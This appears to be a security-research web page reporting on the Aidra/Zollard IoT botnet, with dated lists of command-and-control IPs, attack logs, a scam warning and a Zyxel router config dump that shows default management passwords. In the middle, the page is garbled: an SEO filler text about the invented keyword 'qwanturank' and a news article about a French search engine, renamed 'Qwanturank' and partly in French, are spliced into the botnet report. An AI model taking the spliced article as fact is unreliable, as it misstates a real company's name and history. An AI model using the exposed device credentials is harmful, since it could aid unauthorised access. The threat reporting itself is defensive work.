ATMA - Qwanturank

Mission

We identify and fight:

Are we hackers?

No, we are not, we only report about menaces, exchange information with other researches and warn owners, authorities and providers. Nevertheless, in the past we infiltrated into a few hijacked hosts for a number of reasons:

Those were: a Truetel's host in Taiwan (2009), another one belonging to a tasmanian fireguard patrol (2010), an online shop in Poland (2011), several corporate servers (2011) in Spain (still online, see why and further info in spanish) and a few routers and set-top boxes that had been infected by the "Aidra" botnet (beginning of 2012), before we had made our own traps for this new malware.

Reports

App for Android "CleanMaster"

While reviewing logs, in april 2017 we found that some visits were followed by some others somehow automatically:
88.18.nnn.nnn - - [01/Apr/2017:16:35:46 +0200] "GET /FolderInMyServer/ HTTP/1.1" 200 8286
"Mozilla/5.0 (Linux; Android 5.0.2; P01Z Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

88.18.nnn.nnn - - [01/Apr/2017:16:35:58 +0200] "GET /FolderInMyServer/FileInThatFolder HTTP/1.1" 206 1
"Mozilla/5.0 (Linux; Android 5.0.2; P01Z Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

54.244.48.54 - - [01/Apr/2017:16:39:43 +0200] "GET /FolderInMyServer/ HTTP/1.1" 200 8286 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MAXTHON 2.0); Connect Us

Other IPs behaving like that were 54.244.48.31 and 54.244.49.200, all owned by Amazon EC2. The "user agent" was truthful: all those visitors had installed the app developed by Cheetah Mobile, a chinese company. More, even when you are not browsing the web, it connects frequently to a chinese IP. On april the 23th we asked them by email and never got an answer, so beware: you'll find nothing about this issue in their privacy policies, but the "CleanMaster" app browses the web along with you, literally.

Aidra botnet

In January 2012 we started detecting a great amount of attacks -mainly Telnet- coming from all sorts of devices like home routers, IPTV / set-top boxes, DVDRs, VoIP devices, IP cameras and media centers that had been hijacked by a new malware, named by its primary author "The Aidra bot-net".

Chances are that your desktop antivirus, firewall, etc. will neither detect it nor stop it. Try to keep your net devices off as long as possible, avoid -more than ever- default/empty/trivial passwords and close every port you don't really need.

Update January 2014: latest Aidra-like malware are targetting all sorts of embedded devices and overloading them with bitcoin mining tools. See how this device will soon get fried (let alone the electricity bill...):

The example above is a IP camera manufactured by esslsecurity.com built on top of a ARM hi3515 board, but any "internet of things" device might get infected, like SOHO routers, smart-TVs, set-top boxes... or a fridge :) Bellow, login page of a cheap Hikvision CCTV system, with such a brilliant default password for root as 12345.

Should you want to know more about this Aidra-like malware, known as Zollard, please see spamversand.de or deependresearch.org. For the list of IPs/hosts, see bellow.

We want everyone out there to know that we have been warning several hosting providers since 2012 about hosts of theirs acting as Aidra C&Cs. Some of them like OVH, Linode, Beirtelecom and Corexchange did nothing. Be warned: hosting your site on any of those providers means that you are likely to be blacklisted by most antimalware tools. On the contrary, we congratulate a few responsible services and companies: Edis.at, VPS.net, Qc.to/Afraid.org and LusoVPS.com.

We want to thank in a special way those few particulars who answered to our first call-for-help, reporting logs, sharing information, etc. Thank you Claus Marxmeier, "Internick.internick" and Robert Sauber.

Q: How can I disinfect my device?
A: Quite often, just rebooting it will work. However, try to access it using Telnet: if you can't, perhaps it has been persistently hijacked or, most probably, your device will be dead. Some Aidra builders were so dumb that not only they will not success but they might have turned your device impaired. In that case, contact us, since chances are that you could recover it with a little help.

Q: How can I protect my devices?
A: If you really need Telnet, set a non-trivial password. Desktop tools such as antivirus, firewall, etc. will not help. They are made for taking care of the device that they are being run in, not your router, IPcam, NAS, TIVO...

Q: How many devices are infected worldwide?
A: It had been said that near 11000 but that was absolutely uncertain, it was only an estimation that somebody made based on a screenshot of a command panel. There are several Aidra botnets and variants and you would need to estimate how many devices have been infected by all of them. On top of that, just remember that a rebooted device very often will stay clean until a new infection, so the total can vary greatly in a matter of hours. Having said that, in june 2012 the amount of infections began to decrease. Sadly, in August there are botnets with about 18000 zombies.

Q: Is my smartphone or tablet in risk?
A: At the moment, not specially. Somebody missunderstood our report. We just said that -in theory- Aidra could infect some smartphones, since it can be run under all sorts of CPUs but we have never detected a single one. Actually, Aidra would need to be adjusted to take into account a particular file system, hardware, etc. as well as try something different than Telnet. That's why Aidra is seldom infecting those devices:first time we saw an infected Android device was in August 2012. Having said that, your smartphone can be infected by many other kinds of malwares. On a side note: both iOS and Android are based on Linux but their internals are quite particular.

Q: What about my desktop computer or laptop?
A: Currently there are not much reasons to worry about Aidra.

Q: Will be Linux unsafe from now on?
A: Not at all. Aidra takes advantage of dumb or lazy users/admins who don't care about passwords. You can buy the best safety-box in the world, but if you leave it open...

Q: Is Aidra such a great threat?
A: For individuals it depends on a number of things. If Aidra took over yout set-top box, for example, chances are that you will just find Internet slower than usual. But, if I were you, I wouldn't like to have any kind of malware inside my home router because all data can be trivially stolen. More, since september 2012, a italian botnet master is trying hard to raise money from Aidra, which has used for his bitcoins affairs, but he is also interested in smartcards, which would be much more worrying. Apart from that, we bet that, given the careless attitude of goverments and companies, sooner or later a malware of this kind will be improved enough as to scare the entire world.

Q: Which countries are more affected?
A: As said, it is difficult to say even how many infected devices there are. In Europe most nets have been commanded from Italy (despite using servers in other countries), while most infected devices used to be in Sweden, Switzerland, Netherlands and Poland. Lots also in India and China and not as many as expected in the USA and Japan. As of June 2012, Aidra had nearly vanished but there were still two very active botnet sets left. We sent evidences to the Carabinieri about the first one, and we got (not surprisingly) no answer. The other Aidra botnet set was alive and kicking but quite silent since august, though. Strangely, it was targetting IPs mostly in the US. Last, despite it was not its primary purpose, Aidra has been quite successully figthed since more than one year ago by Carnas's author (whose identity shall remain unreveladed).

Q: I would like to know in detail about Aidra, or get samples, source code...
A: Contact and tell us about you or your organization (which best apply) and what you want that stuff for.
Aidra hosts as of 17th Sept. 2012. Since then, read bellow.:

(*) Very active.
(**) Not a true Aidra but a "DDoS-only" version (Kaiten).
(***) Redirector disabled
(****) Attacking Monsanto websites

How to position yourself on the qwanturank keyword ?

To position yourself on the qwanturank term, you will have to use at least the two essential natural SEO techniques, the generation of quality content and the generation of quality backlinks and repeat all this until first place !

What does the term qwanturank mean ?

It is important to define qwanturank securite internet correctly. Indeed the lexical field and the semantics around a keyword are very important in order to rank on qwanturank. You have to use as much of the vocabulary around qwanturank as possible to make the search engine understand what you're talking about. The point is, here qwanturank is not a real word ! It was invented. So the difficulty is even greater for the algorithm to understand what it is about. The challenge is even greater for referencers. The latter will have to actually create the definition of the word qwanturank themselves. It is they who choose what their site will talk about and therefore how will define qwanturank. The fact is that for now, everyone is copying everyone and agreeing that qwanturank would be a kind of "product" offered by a SEO agency.

This works because by doing this, it is easy to increase the density of the qwanturank keyword in its content and thus help the algo to understand which query to answer. Because actually, it's still the base, the number of times you write a keyword in its content. Anyway, it's too late to talk about another subject now. The algorithm understands that when we speak of qwanturank, we speak overall of natural SEO, SEO agency and contest. Aside from these three topics, it's getting hard to position yourself.

Content strategy for qwanturank

Content level in the broad sense of the term, there are three types to use to position yourself on qwanturank :

Finally, on the subject of qwanturank, we should not forget to mention the netlinking strategy, which works very well in addition to the content. The higher the quality of the competitors ' sites, the faster their sites will position themselves on qwanturank. Sites that link to them need to talk about the topic and have the qwanturank keyword as their anchor.

Yet this is what a French search engine called Qwanturank does, from a small office located on the banks of the Seine.

The French start-up, whose product was launched 18 months ago, is drawing growing anger here that Google has too much control over how Europeans surf the web.

Some lawmakers in the region have already called for the dissolution of the American research giant, while the European Commission, the executive body of the European Union, is in the midst of a lengthy antitrust investigation into the share of around 85 % of Google in the European search engine market.

"You have to make a choice," said Jean Manuel Rozan, a former financier who co-founded Qwanturank in 2011, over a cup of coffee. "Europe is the only place in the world where people think Google is the Internet."

But it's easier to turn Europe's anti-Google sentiment into a successful business.

Google and its various services, including cards and online shopping, have a grip on how Europeans look for information. And despite the perceived antipathy of Europeans towards American technology companies like Amazon and Facebook, these companies continue to be strongly followed in the 28 countries of the block.

Pour se démarquer, Qwanturank a vendu cette année 20 % de ses parts à Axel Springer, l’éditeur allemand, pour environ 6 millions de dollars, principalement pour acheter des serveurs européens. Mathias Döpfner, le directeur général de l’éditeur, a ouvertement critiqué la domination de Google en ligne. M. Rozan affirme que Qwanturank a réalisé un bénéfice d’environ 1,8 million de dollars l’année dernière mais qu’il affichera une perte en 2014, alors que la société s’étend sur de nouveaux marchés comme l’Allemagne. L’entreprise emploie moins de 50 personnes entre ses bureaux de Paris et de Nice, une ville du sud de la France.

The French start-up has also tried to take advantage of the growing mistrust of Europeans regarding the way they are tracked online, as companies like Google and Facebook use the data collected on the history of Internet users to adapt advertising to the specific needs of each.

Along with other alternatives to Google like DuckDuckGo and Ixquick, a Dutch search engine, Qwanturank claims that it does not follow the movements of Internet users and sells advertising solely on the basis of search queries from individuals.

"We can build a valuable business that can deliver search results to people without following them," said Rozan, who said that people made about 1.6 billion search queries by Qwanturank in 2014 - or less than half of the search queries that Google processes in a single day.

Qwanturank also plans to launch a child-friendly search engine - Qwanturank Junior - in early 2015. Google has announced similar plans, but in a sign that the French government is keen to find an alternative to the US tech company. , the national education ministry said it will start using Qwant Junior in some French schools next year.

"If you have three million children who will search on Qwanturank, then there will be six million parents who will know Qwanturank," said Eric Leandri, another of the co-founders of the start-up, who added that the start -up was in discussion with Axel Springer to become the default search engine on some of the publisher's websites. “When we launched the start-up, everyone explained to us why we shouldn't do it. Now they think it's a good idea. "

The other novelty of Qwanturank compared to the traditional search engine model is to include social media messages from services like Twitter directly in the search results.

When people use the company's search engine, for example, four columns appear on the web page that offer different takes on Internet queries. This ranges from traditional search results to what is known as the "Qnowledge Graph", which provides general research-based information from sites such as Wikipedia.

"We want to deliver results both on the web and on social media," said Qwanturank's Rozan. "If we just want to offer the same service as Google, we should stop now."

The French could also learn a few lessons from Europe's past. In 2008, a French consortium - supported by the country's politicians - created Quaero, an online research tool supposed to compete with its American counterparts. However, after $ 240 million in public and private funding and several efforts to reorganize the project, Quaero was closed in late 2013.

Despite previous failures to build a credible European search engine, co-founders of Qwanturank hope the focus on privacy and attempts to combine social media posts with traditional search results will set it apart from Google, whose projects are as diverse as an operating system for smartphones and which is trying to develop driverless cars.

"Google is no longer a search engine," said Leandri of Qwanturank. “We are just a search engine. We don't make robots ”.

On sept. the 18th we were receiving so many malwares (and not only "Aidra fresh builds") that we thought that it would be worth to start the historic track bellow. Please note that, on the contrary, some of the Aidra builds that have been active for long are listed above.
120903
======

50.116.37.93:8082

120905
========

164.40.154.20:8081
164.40.154.20:8082
164.40.154.20:8083
164.40.154.20:8084

37.59.4.171:8945
sept. 23th attacking:
178.210.250.71:6669 250-71.static.businesstel.hu
208.43.167.112:80 208.43.167.112-static.reverse.softlayer.com
208.43.167.112:22 208.43.167.112-static.reverse.softlayer.com
(both IPs, in turn, used by hackers)

120917A (2 malwares in this record)
=======
94.125.182.253:6667 ircnet.irkki.fi irc.atw-inter.net irc.stealth.net open.ircnet.net uk.ircnet.org
2001:1af8:4300:a005:46:0:0:2
106.187.102.56:5863 Linode

37.59.4.171:8745

120919B
=======
37.59.4.171
94.23.67.242:8620 sm4sh.mashing.it OVH Italia

173.204.227.25:80 Gogrid
173.204.227.25:81 Gogrid
173.204.227.26:80 Gogrid
173.204.227.26:81 Gogrid
173.204.227.27:80 Gogrid
173.204.227.27:81 Gogrid
173.204.227.28:80 Gogrid

78.46.181.233:65535 mail152.taseptrev.com

121203
========

5.199.138.123:10810 (Nixhosting.org)

(We had an hiatus from december to february)

130307
========

46.249.42.153:9999 (Serverius)

130314
========

irc.byroe.net:
31.210.110.250:6667 (TurkDNS)
74.63.243.175:6667 (Limestone)
91.121.73.41:6667 (OVH)
96.9.163.56:6667 (BurstNet)
103.6.207.61:6667 (Pusat Media)
103.13.240.208:6667 (HostDime)
106.187.97.158:6667 (aku.eten-keren-a.biz)
175.107.185.54:6667 (Uber Global)
184.22.117.77:6667 (Hostnoc)
199.195.193.101:6667 (Midphase)
204.45.97.42:6667 (FDCservers)

130710
========
37.157.255.76 37.157.255.76.vps.nixhosting.org myLoc
5.199.136.28 5.199.136.28.vps.nixhosting.org myLoc
192.241.192.140 cloud1.ants.ws

130720
========
31.31.72.87 WEDOS (Cz)
173.230.149.172 li159-172.members.linode.com

130721
========
192.198.83.48 Dacentec (US)
91.121.72.91 ks26330.kimsufi.com (OVH) or:
mail.audibook.com
mail.bordeaux-wifi.com
mail.europe-wifi.com
mail.lyon-wifi.com
mail.marseille-wifi.com
mail.montpellier-wifi.com
mail.osmozis.net
mail.wificamping.com
maildefer.europe-wifi.com
maildefer.lille-wifi.com
maildefer.lyon-wifi.com
maildefer.marseille-wifi.com
maildefer.meshotspot.com
maildefer.montpellier-wifi.com
maildefer.osmospot.com
maildefer.wifi-expo.com
maildefer.wificamping.com
maildefer.wifiski.com
mailspool.hotzonepro.com
mailspool.meshotzone.com
mailspool.osmospot.com
mailspool.osmozys.com
mailspool.wifi-expo.com
mailspool.wificamp.fr
mailspool.wifiski.com
(most also resolve to 88.191.67.37)

130801
========
50.116.7.213 li433-213.members.linode.com www.pucssa.org
91.121.73.41 OVH
109.123.112.25 VPS NET
106.187.97.158 aku.eten-keren-a.biz (Linode)
72.11.149.134 rapidshare-search-center.com (OC3, USA)
204.188.221.230 irc.coplax.us.to (Sharktech)

130805
========
31.31.72.87 Wedos (Cz)

130806
============
37.252.124.117 Tilaa (NL) (already dead)
178.79.183.247 li352-247.members.linode.com
188.138.9.69 atlantic532.eu.unmetered.com (Germany)

130807
============
91.121.21.139 ks39329.kimsufi.com (OVH)
Versions like this one are compiled with messages in a perfect italian:
"Alla prossima BoSS... baciamo le mani!" (we kiss the new boss' hands)
"Hai sbagliato Frocio di Merda!" (you did it wrong, -insult-)

130812
============
(updated 130806)
37.235.48.156 156-48-235-37.static.edis.at
188.138.9.69 atlantic532.eu.unmetered.com

130813
============
(updated 130812)
199.175.53.162 (USA, VPS Cheap)
188.138.9.69 atlantic532.eu.unmetered.com

Aidra had slowed down its new releases,
so a handfull versions weren't published during these months.

131216
============
Starting with this one, nearly all new versions are "Zollard" malware.

131217
============
46.105.17.155 155.ip-46-105-17.eu OVH
178.33.183.162 OVH Systems socialmediaexpert.info

140202
============
"common Aidra"
146.255.36.1 n1nlhg336c1336.shr.prod.ams1.secureserver.net
209.141.45.120 FranTech Solutions buyvm.net; april: calpolyfast·org

140205
============
Bitcoin miner
198.245.56.17 mining.usa.dallas.hypernova.pw (OVH)
37.221.163.19 ds.protected.javapipe.com > 37.221.163.19.reserved.voxility.com (Romania)
66.85.142.21 ltc-eu.give-me-coins.com (Secured Servers LLC)

140206
============
Bitcoin miner
78.157.207.42 hosted-by.securefastserver.com (qhoster.net)
162.212.255.218 218.255.212.162.in-addr.arpa.static.cnservers.com (US)

140207
============
91.121.21.139 OVH, FR

140209
==================================
Bitcoin miner
162.219.57.7 Fastreturn, US
96.44.129.66 vypor.is.awesome.net Quadranet. US
94.102.49.168 Ecatel, NL

140210
============
Bitcoin miner
46.249.51.176 Serverius Holding (NL)

140314
==================================
Same thing than 140209 using also:
5.178.66.104:3339 Serverius hosting (NL)
199.241.188.90:164 mcflix.com and ww20.netkl.org Dacentec, Inc. (US)

140315
==================================
"Reloaded" 140209 miner version
96.44.129.66 unassigned.quadranet.com OC3 Networks & Web Solutions (US)

140318
==================================
"Reloaded" 140210 miner version
93.174.95.67 Ecatel Network, Netherlands

140415
==================================
Surely a new 140202 version, quite complete "features":
Trying to permanently infect devices, adv. fraud
and stealing set-top credentials.
209.141.38.67 resolving as '.' :) FranTech Solutions (US)
209.141.40.181 FranTech Solutions (US)
50.3.116.59 Eonix Corporation (US)
178.79.183.247 li352-247.members.linode.com (UK)

We are glad "Vypor" has been visiting us in April from 107.196.197.216.

140501
============
Again, a 140202 new version
173.208.222.82 WholeSale - MJS Marketing, US. financecox.com, gamersnoo.com and a few more
5.104.224.209 Snel Internet Services, Netherlands smartmoneymakers2.com

140510
============
Common Aidra
37.0.123.215 connect.bigddos.net irc.bigddos.net Pallada Web Service / PWS-Network Russia

140515
============
"Reloaded" 140210 miner version
93.174.95.67 Ecatel Network,NL

140603
==================================
212.129.3.25 212-129-3-25.rev.poneytelecom.eu ONLINE S.A.S France

140604
==================================
"Reloaded" 140210 miner version
5.104.224.215 Snel, Netherlands
93.174.95.67 Ecatel Network,NL, now in TCP 3342
162.253.66.74 DataWagon LLC US

140628
============
217.23.2.249 customer.worldstream.nl

140715
============
Standard Aidra
92.222.162.205 205.ip-92-222-162.eu AS16276 OVH
192.99.160.16 AS16276 OVH Hosting Canada

140805
==================================
New 140209 version
162.219.57.3 in TCP 9003, Fastreturn, US
96.44.129.66 former vypor.is.awesome.net, now 96.44.129.66.static.quadranet.com
173.208.222.82 crypto-pump.com WholeSale - MJS Marketing

140815
==================================
Just another "Vypor" clon
93.174.93.52 TCP 8005 nlnd02.xsltel.com Ecatel NL
176.10.250.37 h-176-10-250-37.na.cust.bahnhof.se Bahnhof Internet, Sweden

140901
==================================
Rebuilt 140815 version
93.174.93.52 in TCP 65533 and 65534 nlnd02.xsltel.com Ecatel NL
69.163.37.115 AS46816 Directspace houlai.org, nvshizhu.com
176.10.250.37 AS8473 Bahnhof Internet, Sweden

140919
=========
89.238.150.154 AS9009 M247 Open Hosting, UK
173.208.222.82 AS32097 WholeSale MJS Marketing

140920
==================================
Rebuilt 140815 version, same IPs

About our Twitter account
All tweets are randomly delayed: it may take hours or days since the actual detection. Besides, due to Twitter limits, we tweet only a fraction of all detections (usually we tend to skip already wellknown bad IPs such as those famous chinese SSH attackers)

For those who send traffic claiming to be "good", for academic purposes or for the sake of our own safety, please note that our policy is simple: a unique unexpected SYN packet may be enough to be reported. If your intentions are not hostile, surely the World already knows about them and our reports don't mean a thing.

If you are a hosting company, ISP or alike, don't ask us for detailed logs, evidences, etc. unless they are really needed. Firstly, if you really want to know about them, you should know that in most cases, it's as easy as just monitoring outbond traffic related to the reported attacks. Secondly, we can not provide dozens of that kind of reports for free each single day. Keeping an eye on your customers' behaviour is your job, not ours. Besides, we will never answer to dumb Twitter bots spitting "Please report that issue to blah blah" tweets, only for entering in a "customer ticket hell" and get a final response such as "Sorry, you are not a customer of ours, please email to... ".

Currently, our Tweets fall into one of this categories:
"ssh": SSH daemon/server, usually port TCP 22, although we watch alternative ports for most services.

"telnet": Telnet daemon/server, usually TCP 23.

"mailer": Email daemon/server, several ports.

"rdp": Windows terminal server (Windows), usually TCP 3389.

"vnc": Remote Desktop Servers, usually TCP 5900.

"ftp": File Transfer Protocol, usually TCP 21.

"spam": Email/forum/referral/you-name-it spammers, close affiliates or just those who pay for it.

"malware": Plain hosting, command & control servers, etc.

"http": Threats, scans, bad crawlers, etc. targetting web servers and related technologies such as HTTPS, proxies, PHP, *SQL...

"ntp": Network Time Protocol, commonly abused for DDoS amplification attacks.

"dns": Domain Name System, commonly abused for DDoS amplification attacks.

"smb": Windows shares (NetBIOS, SMB, CIFS).

"unspecified": Such as those targetting port 19 "CharGen", port scans, ping floods, etc.

Yet one more backdoor in an embedded device?

After taking a look at the file system of a used Zyxel_P-2612HNU that we recently got, we found a weird thing apart of the already known vulnerabilities such as the "NsaRescueAngel" issue. If you type gzip -d /mnt/NAND/etc/rc.conf.gz -c in a Telnet session, you'll get:

<< dl_auth
dl_auth_cpeId="1"
dl_auth_pcpeId="0"
dl_auth_uname="CISCO-serial123"
dl_auth_passwd=""
dl_auth_realm=""v dl_auth_nonce="3nanfc5fo"
dl_auth_uri="/"
dl_auth_algo="MD5"
dl_auth_cnonce="abcdef123"
dl_auth_opaque=""
dl_auth_qop=""
dl_auth_nc="00000001"
dl_auth_procookie="1"
dl_auth_ftype=""
dl_auth_fname=""
dl_auth_cmdkey=""
dl_auth_status="0"
dl_auth_starttime="0"
dl_auth_endtime="0"
dl_auth_futuretime="0"
dl_auth_size="0"
>> dl_auth

<< tr69_auth
tr69_auth_cpeId="1"
tr69_auth_pcpeId="0"
tr69_auth_realm="IgdAuthentication"
tr69_auth_nonce="3nanfc5fo"
tr69_auth_uri="/acs"
tr69_auth_algo="MD5"
tr69_auth_cnonce="aabbccdd"
tr69_auth_opaque=""
tr69_auth_qop="auth"
tr69_auth_nc="00000001"
>> tr69_auth

<< tr69_misc
tr69_misc_cpeId="1"
tr69_misc_pcpeId="0"
tr69_misc_authacs="0"
tr69_misc_authtype="digest"
tr69_misc_event="1"
tr69_misc_cmdkey=""
tr69_misc_incxml="0"
tr69_misc_incsoapact="1"
tr69_misc_acsgetrpc="0"
tr69_misc_bootstrap="0"
tr69_misc_tr69enable="1"
tr69_misc_tr64enable="0"
tr69_misc_prevtime="0"
>> tr69_misc
<< mgmt_server
mgmt_server_cpeId="1"
mgmt_server_pcpeId="0"
mgmt_server_acsurl=
mgmt_server_acsuname="000319-DMA66"
mgmt_server_acspasswd="000319-DMA66"
mgmt_server_perinfena="1"
mgmt_server_perinfint="3600"
mgmt_server_perinftime="0"
mgmt_server_paramkey=""
gmt_server_conrequrl=
mgmt_server_conrequname="000319-DMA66"
mgmt_server_conreqpasswd="000319-DMA66"
mgmt_server_upgsmanaged="0"
mgmt_server_udpconrequrl="10.10.10.250:8080"
mgmt_server_udpconreqnotifylimit="0"
mgmt_server_stunenable="0"
mgmt_server_stunserveripaddress="20.20.20.3"
mgmt_server_stunserverport="3478"
mgmt_server_stunusername="acsstunuser"
mgmt_server_stunpasswd="acsstunpasswd"
mgmt_server_stunmaxkeepalivetime="100"
mgmt_server_stunminkeepalivetime="10"
mgmt_server_natdetected="0"
mgmt_server_mngdevnotifylimit="10"
>> mgmt_server

<< manageable_device
manageable_device_Count="0"
>> manageable_device

<< lanconf_security
lanconf_security_cpeId="1"
lanconf_security_pcpeId="1"
lanconf_security_confPassword="tr64conf"
lanconf_security_resetPassword="tr64reset"
>> lanconf_security

20.20.20.20 belongs to CSC (Computer Sciences Corporation, Virginia, US) and there are/were four domains that pointed to that IP: bhsywg.com (protected whois), gporodiedan.com (mexican company), advocaciatorresrn.com (brazilian company) and kedvezo-hitelek.com (protected whois). Please someone skilled in TR069 tell us wether this could be a backdoor and who might have put it here or, on the contrary, it's just debugging data left behing.

Since June the 21th the website escolademusica.molinsderei.org was attacking servers in Spain. First of all, we warned the ISP, the webmaster and that council's authorities -none was kind enough as to reply a mere "thanks"- and afterwards we investigated who the actual attackers could be. Let's suppose than in "Molins de Rei" there are no fanatics related to that website, so we can assume they were using hijacked servers, apart of some proxies and a lot of IPs from islamic countries. After a few searching in Google, Whois, Geolocation, etc. we got to know that the culprits are a islamic gang of script kiddies that compite mostly for defacements, while they share pro-islamic interests.

The good news is that they are clumsy and not very skilled: most just look for missconfigured servers with "PUT" enabled; they simply try to upload a file and then download it, which means that PUT is working for sure. So we got one of those files, a GIF image whose author uses as a "signature" (filename in Russian, he's smart as can be) and we waited...

In a few hours we saw the first "PUT /nyet.gif" + "GET /nyet.gif" attempt. Believing he had succeed, he hurried to report his "achivement" to his mates :) in the infamous www.zone-h.org and, in a moment, we began receiving more attacks of the kind as well as some XSS. Some days later they gave up, but meanwhile we have been collecting all their IPs (please note: we are not listing proxies or hijacked servers, which, BTW, is mostly a Kosovar speciality):

IP address Other information
41.100.176.80
197.202.149.229
31.210.117.181
5.0.67.163
146.251.101.130
41.100.100.236
5.43.200.116
197.28.3.95
41.100.200.80
41.248.205.63
31.9.122.197
188.161.79.91
37.141.152.40
88.232.7.89
41.224.102.57
41.249.132.50
41.140.193.108
41.238.41.150
AS36947 Algerie Telecom
AS36947 Algerie Telecom
AS197328 31-210-117-181.turkrdns.com, Turkey
AS29256 Syrian Telecommunications
AS35819 Etihad Etisalat Company, Saudi Arabia
AS36947 Annaba Telecom, Algeria
AS51407 Mada ALArab LTD Segment, Palestine
AS37492 Orange - Agence Tunisienne Internet
AS36947 Region Chlef, Algeria
AS6713 ADSL_Maroc_telecom, Rabat, Morocco
AS29256 Tarassul ISP, Syrian Telecommunications
AS12975 Palestine Telecom
AS35819 Saudi Arabia
AS9121 TTNET Turk Telekomunikasyon
AS37492 ORANGE-TN Tunisia
AS6713 IAM-AS,MA Morocco Tangier Maroc Telecom
AS6713 ADSL_Maroc_telecom
AS8452 TE Data, Egypt
Beware fake Microsoft assistance scam

In May-June 2014 several people in Spain was phoned from a fake Microsoft customer service. So far these are the numbers we got to know: 16077670057 and 15124511556. Beware also of 4935120443, 442033100000 and 18176499077.
Atma.es under attack

No wonder, just another one, but this time it was more intense than usual although not sophisticated at all: they simply tried to overload this server by downloading some files over and over. By using our own deny list -excepcionally and urgently updated during those days- we got rid of most malicious visitors (nearly all being proxies in infected boxes or Tor nodes). Happily, a choice of them went soon offline because they can not cope with some bounced back traffic :) Please, dear attacker: (as long as you can't find a better way) keep on trying, we miss your huge amount of requests!!!
Yet another University scanning the entire world!

In this website we have already talked about the University of Columbia peeking inside each and every IP in the world since years ago. Well, it seems to be fashion these days in the USA, since in 2013 the University of Michigan began a similar "research". If you want to get rid of those visits, block all IPs from 141.212.121.2 to 141.212.121.124.
WTF is going on with some Microsoft's IPs?

8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 168.62.36.16 | 2012-11-03 17:15:18 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 168.61.24.174 | 2012-11-08 06:53:08 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 168.62.181.42 | 2012-11-08 06:30:55 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 168.62.160.84 | 2012-11-08 05:49:12 | vncprobe
One incident in detail:
08/11/2012 04:13:32 Got connection from client 168.62.160.84
08/11/2012 04:13:32 authProcessClientMessage: authentication failed from 168.62.160.84
08/11/2012 04:13:32 rfbAuthProcessClientMessage: password check failed
08/11/2012 04:13:32 Client 168.62.160.84 gone
08/11/2012 04:13:32 Statistics events Transmit/ RawEquiv ( saved)
08/11/2012 04:13:32 TOTALS : 0 | 0/ 0 ( 0.0%)
08/11/2012 04:13:32 Statistics events Received/ RawEquiv ( saved)
08/11/2012 04:13:32 TOTALS : 0 | 0/ 0 ( 0.0%)
08/11/2012 04:13:33 Got connection from client 168.62.160.84
July 2013, some more detected from MSN-AS-BLOCK:
137.116.213.183 137.116.213.211 137.116.240.105
137.117.168.91 137.117.169.58 137.135.0.123
168.63.214.105 168.63.255.197
(Yet another) Remote desktop attack
We receive attacks to port 3389 on a daily basis, but these days they have increased hugely. This is what we got yesterday (sept. 22th) from one IP alone:

107-1-118-83-ip-static.hfc.comcastbusiness.net (107.1.118.83)
114.251.97.180
115.182.50.74
119.Red-80-36-81.staticIP.rima-tde.net (80.36.81.119)
122.255.29.83
165.Red-213-97-179.staticIP.rima-tde.net (213.97.179.165)
174.139.57.178.CUSTOMER.VPLS.NET (174.139.57.178)
174.226.60.213.static.mundo-r.com (213.60.226.174)
184-22-120-202.static.hostnoc.net (184.22.120.202)
211.144.122.60
220.225.98.156
224ikxtr0.ni.net.tr (95.173.185.224)
230.13.187.60.broad.sx.zj.dynamic.163data.com.cn (60.187.13.230)
24.171.213.2
37.59.165.46
37.59.67.82
62-233-107-71.iomart.com (62.233.107.71)
74-94-41-122-Philadelphia.hfc.comcastbusiness.net (74.94.41.122)
82-69-112-174.dsl.in-addr.zen.co.uk (82.69.112.174)
86.106.82.14-pknetworks.ro (86.106.82.14)
86.47.237.73
89.121.33.202
89.141.17.48.dyn.user.ono.com (89.141.17.48)
89-212-0-232.static.t-2.net (89.212.0.232)
99.Red-80-26-148.staticIP.rima-tde.net (80.26.148.99)
bzq-79-179-160-79.red.bezeqint.net (79.179.160.79)
correo.soldavigil.com (80.35.118.168)
host-109-235-252-210.routergate.com (109.235.252.210)
host5-126-static.225-95-b.business.telecomitalia.it (95.225.126.5)
host55-150-static.241-95-b.business.telecomitalia.it (95.241.150.55)
hq.gopeng.com.my (175.139.198.145)
HSI-KBW-095-208-240-202.hsi5.kabel-badenwuerttemberg.de (95.208.240.202)
ip-37-201-229-16.unitymediagroup.de (37.201.229.16)
ll-254.166.223.85.od.sovam.net.ua (85.223.166.254)
mail.huybregts.nl (80.112.233.178)
olqk2t.static.otenet.gr (79.129.30.129)
pd95b2a4d.dip0.t-ipconnect.de (217.91.42.77)
static-254-228-60-95.ipcom.comunitel.net (95.60.228.254)

Universities and hacking

The fact that there are important and prestigious institutions with infected computers is worrying. But even more, when we are talking about departments concerning teaching about computers. In the past we warned some of them in Germany, USA and the UK, and all of them sorted the issue out promptly. On the contrary, some others like the spanish UNED neither answered nor fixed them. Right this september, it happened the same again: this time we warned the "Dipartartimento di Informatica" of the University of Milan about 159.149.71.7 kermit.crema.unimi.it which was attacking others' 3389 ports. More than one month ago, we wrote to nine email addresses: professors, researches and bureau... none of them was kind enough as to write back a single line. So, we still don't know wether it was an infected box or they were the true hackers but, too good, at least we detected no more attacks since then.

Why does Nokia want to know my email password?

Did you know that when you use the Nokia's email app, you are giving them your address and password, as seen in this blog?. In Nov. 2011 we checked it out by ourselves using a Nokia X3-02 and a gMail account:

Chinese and russian scanners
In Oct. 2011 a number of IPs brought to our attention. Mostly located in China, those people has been scanning the rest of the world since years ago.

Clearly linked to "Proxyfire" Other scanners
66.152.162.116
74.118.194.81
80.82.66.113
98.130.166.202
173.242.116.69
175.45.25.79
195.58.176.133
202.194.20.239
218.6.19.3
222.208.183.218
222.215.230.175
4.4.4.4
58.51.95.10
58.218.199.58
58.218.199.147
58.218.199.227
58.218.199.250
59.53.91.9
61.152.144.145
64.90.50.50
64.120.230.132
64.237.54.179
65.254.34.178
66.152.162.116
74.52.107.130
74.117.63.74
74.206.242.164
74.222.12.98
85.92.157.116
97.74.215.136
112.126.84.92
121.12.173.166
131.215.141.60
173.201.240.31
173.201.215.167
174.37.48.98
